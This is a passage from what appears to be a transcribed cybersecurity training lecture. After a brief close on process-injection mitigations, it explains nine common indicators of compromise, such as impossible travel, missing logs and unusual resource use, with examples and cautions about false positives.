functionalities as well. This includes injection through DLLs, thread execution hijacking, process hollowing, process doppelganging, asynchronous procedure calls, and portable execution injections. To mitigate against process injections, you should use endpoint security solutions that are configured to block common sequences of attack behavior, you can utilize a security kernel module, and you can utilize the practice of least privilege.
In this lesson, we will discuss some common indicators of compromise. In the world of cybersecurity, indicators of compromise, commonly referred to as IOCs, are pieces of forensic data that identify potentially malicious activity on a network or system. These IOCs serve as the digital evidence that a security breach has occurred. These indicators of compromise include things like account lockouts, concurrent session usage, blocked content, impossible travel, resource consumption, resource inaccessibility, out-of-cycle logging, publish/documenting that you've been hacked, and missing logs. First, we have account lockouts. An account lockout is a common indicator of compromise that occurs when an account has been locked out due to multiple failed login attempts. This could indicate a brute force attack that was attempted by a hacker who was trying to gain access by guessing the user's password. For example, if an account is locked out after numerous unsuccessful login attempts in a short period, it is usually a clear sign that someone is trying to break into the account. Account lockout policies vary among different systems. Some systems may lock out an account after a certain number of attempts of failed logins, while others may increase the delay between login attempts after each failure to effectively slow down the attacker and make a successful brute force attack much more impractical. The duration of the account lockout will also vary depending on your system. Some systems may implement a temporary lockout, where the account is automatically unlocked after a certain period of time, such as 15 minutes or 4 hours or some time-based reset. Other high-security systems may require manual intervention by an administrator to unlock the account to ensure that the suspicious activity is investigated prior to the account being unlocked. While account lockout is a valuable security feature, it must be balanced with usability. Overly strict account lockout policies can lead to increased support calls and frustrated users. For example, if an account is locked after 3 failed attempts, a user could be locked out simply by mistyping their password, so it is important to weigh the security benefits against the possible user inconvenience that a low lockout threshold may create. Second, we have concurrent session usage. Concurrent session usage refers to multiple active sessions from a single user account. This could indicate that the account has been compromised and is being used by an attacker while the legitimate user is logged in. For example, if an employee is logged into their account from their office computer, but another session from a different location is active at the same time, it's a strong indication of a security breach. In this example, it could have been a false positive since an employee could be logged in from different devices. However, exercising caution is important here because if one session is in the United States while the other active session is happening from Europe, then it is a good sign that a compromise has occurred. Third, we have blocked content. Blocked content is another indicator of compromise that refers to attempts to access or download content that has been blocked by security protocol. This could indicate a user trying to access malicious content or an attacker trying to download sensitive data. For example, if there are repeated attempts to download a block file, it could suggest that a user's account has been compromised and is being used to steal data. Fourth, we have impossible travel. Impossible travel is a unique indicator of compromise that involves detecting logins from geographically distant locations within a specific time frame that makes physical travel between those locations impossible to achieve. For example, if a user account logs in from New York and then from London within an hour, there's a good chance that an account compromise has occurred because a single user cannot travel from New York to London in less than 5 or 6 hours by taking a plane. Often, you will see impossible travel and concurrent sessions usage grouped together since they often, but not always, occur simultaneously. Fifth, we have resource consumption. Unusual spikes in resource consumption, such as CPU, memory, or network bandwidth, can serve as a good indicator of compromise. This excessive resource utilization can indicate a malware infection or a distributed denial of service attack or DDoS attack that is concurrently underway. For example, if a server that typically uses 20% of its CPU capacity and then suddenly jumps to 90%, it could be a good sign that the server is under attack or has been compromised. Another example would be if you're browsing the web on your workstation and your GPU usage is at 90%. This is a good indication that the system may be a zombie and has been enrolled as a crypto mining agent or performing some other kind of computational resource heavy task for a threat actor, both of which have become very popular attacks in recent years. Sixth, we have resource inaccessibility. Resource inaccessibility refers to the inability to access certain resources such as files, databases, or network services. This could indicate a ransomware attack where an attacker encrypts a victim's files and demands a ransom for their release. For example, if a user suddenly cannot access these files and receives a ransom note, this is an obvious and clear sign that they're a victim of a ransomware attack. Seventh, we have an out-of-cycle logging. Out-of-cycle logging refers to log entries that occur at unusual times, such as late nights or on weekends where no one is expected to be working. This type of out-of-cycle logging usually indicates that an attacker is trying to hide their activities during off-peak hours. For example, if their log entries show activity at 3 a.m. when offices typically close, this could suggest that a security breach has occurred on the network. 8, we have missing logs. Missing logs, like out-of-cycle logging, is another sign that a compromise has occurred. Attackers often delete to hide their activities and make it harder for investigators to trace the attacker's footsteps through the network. For example, if a system's logs suddenly have a gap of several hours or days, this might suggest that an attacker has been tampering with the logs to cover their tracks. Ninth, and finally, we have published articles or documents that your organization has been hacked. Sometimes an attacker will publicly disclose that they hacked the system, either to boast about their skills or cause reputational damage to the organization. This type of publishing can occur on social media, hacker forums, in a newspaper article, or even on a victim's own website. For example, if a company's website is defaced with the message claiming that the hacktivism group was responsible for the attack, this is obviously a clear sign that your website has been compromised. So remember, recognizing these indicators of compromise is crucial to your success as a cybersecurity professional. Indicators of compromise are the evidence includes left behind by a threat actor that can provide us insights and some early warning signs of potential breaches so that we can act swiftly to contain and mitigate any damage. However, it's important to remember that not all indicators of compromise necessarily means that a compromise has occurred. Instead, there are hints or clues that something has happened, and it's still up to us to decide if it is a true compromise or if it was simply the result of a system error, or it was a legitimate user activity, or it is simply a false positive. For this reason, you will spend a lot of your time as a cybersecurity professional combing through event logs to determine if an event was really part of a compromise or not.